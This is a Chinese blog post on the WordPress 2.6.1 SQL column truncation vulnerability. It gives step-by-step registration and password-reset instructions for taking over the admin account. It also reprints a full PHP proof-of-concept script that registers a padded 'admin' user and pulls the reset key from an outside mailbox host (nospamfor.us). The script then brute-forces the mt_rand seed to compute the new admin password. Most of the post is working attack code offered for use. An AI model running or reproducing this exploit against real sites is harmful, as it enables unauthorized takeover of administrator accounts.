WordPress的SQL Column Trunction 漏洞
今天出的这个wordpress漏洞如下:
注册一个用户名为: admin(55个空格)x
这样的用户名,就可以通过取回密码拿到原管理员的密码了。
Vulnerable Systems:
* WordPress version 2.6.1
Exploit:
1. Go to URL: server.com/wp-login.php?action=register
2. Register as:
login: admin x (the user admin[55 space chars]x)
email: your email
Now, we have duplicated 'admin' account in database
3. Go to URL: server.com/wp-login.php?action=lostpassword
4. Write your email into field and submit this form
5. Check your email and go to reset confirmation link
6. Admin's password changed, but new password will be send to correct admin email
Additional Information:
The information has been provided by irk4z.
The original article can be found at: http://irk4z.wordpress.com/
相关文章
#!/usr/bin/php
<?php
# ------------------------------------------------------------
# quick'n'dirty wordpress admin-take0ver poc
# by iso^kpsbr in august 2oo8
#
# works w/ wordpress 2.6.1
#
# .oO( private -- do not spread! )Oo.
#
# you'll have to make sure you run roughly the same
# php version as on the server, that is: if server
# is >=5.2.1 you'll need to be as well, in case
# server is <5.2.1, your php also needs to be below.
# to make sure it works you'll need the exact same version!
# also, mod_php works better than (f)cgi..
# (this is a first working version - not a very reliable one)
#
# you should create rainbow tables to make this work in a
# real world scenario:
# php-5.2.0/php createtables.php > wp261_php520
# php-5.2.1/php createtables.php > wp261_php521
#
#-------------------------------------------------------------
$BLOG = $_SERVER['argv'][1];
echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n";
if(!$BLOG) {
echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n";
echo " fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n";
exit;
}
$UA = "WordpressAdminTakeover";
$MBOX="wp".`ps|md5sum|head -c 8`;
$EMAIL="$MBOX@nospamfor.us";
echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?
"[X] rainbow tables available\n" :
"[!] rainbow tables not found - this will be really slow\n";
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",20);
if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) {
die("[!] $BLOG is no valid URL\n");
}
$HOST = $match[1];
$PATH = $match[2];
if(!$PATH) $PATH='/';
echo "[-] registering new admin user\n";
$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
$data = "user_login=admin".str_repeat("%20",60)."x&user_email=$EMAIL";
$req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data;
fputs($suck, $req);
sleep(1);
fclose($suck);
echo "[-] requesting resetlink and mail to '$EMAIL'\n";
$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
$data="user_login=$EMAIL&wp-submit=Get+New+Password";
$req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data."\r\n";
fputs($suck, $req);
echo "[.] giving $BLOG some time to deliver mail..\n";
for($i=0;$i<8;$i++) {
fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n");
sleep(2);
}
echo "[-] fetching resetlink token $MBOX\n";
$PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us");
if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right above\n");
$MAILID=$match[1];
echo "[-] fetching resetmail $MAILID\n";
$WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX");
if(!preg_match('/key=([A-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n");
$KEY=$match[1];
echo "[X] found resetkey $KEY\n";
echo "[-] resetting password\n";
$req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent:$UA\r\nConnection: close\r\n\r\n";
fputs($suck, $req);
while(!feof($suck)) {
#echo "D:".
fgets($suck);
}
fclose($suck);
echo "[-] calculating password\n";
$SEED=false;
if(file_exists('wp261_php520')) {
$SEED=`grep -F $KEY wp261*|cut -d : -f 1`;
echo "[X] got seed $SEED from rainbow table\n";
}
$PASSWORD=calcpass($KEY, $SEED);
echo "[X] all done.";
exit;
function calcpass($resetkey, $seed = false) {
mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand();
define('BUGGY', $a == $b);
echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." mode\n";
echo "[+] got key $resetkey via mail\n";
if(!$seed) $seed = getseed($resetkey);
if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n");
mt_srand($seed);
echo "[-] seed for key ".wp_generate_password(20,false)." is $seed\n";
$pass = wp_generate_password();
echo "[+] new credentials are admin:$pass\n";
return $pass;
}
function wp_generate_password($length = 12, $special_chars = true) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
if ( $special_chars )
$chars .= '!@#$%^&*()';
$password = '';
for ( $i = 0; $i < $length; $i++ )
$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
return $password;
}
function getseed($resetkey) {
echo "[-] calculating rand seed for $resetkey (this will take a looong time)";
$max = pow(2,(32-BUGGY));
for($x=0;$x<=$max;$x++) {
$seed = BUGGY ? ($x << 1) + 1 : $x;
mt_srand($seed);
$testkey = wp_generate_password(20,false);
if($testkey==$resetkey) { echo "o\n"; return $seed; }
if(!($x % 10000)) echo ".";
}
echo "\n";
return false;
}
?>
姓名:Chinadu
近期评论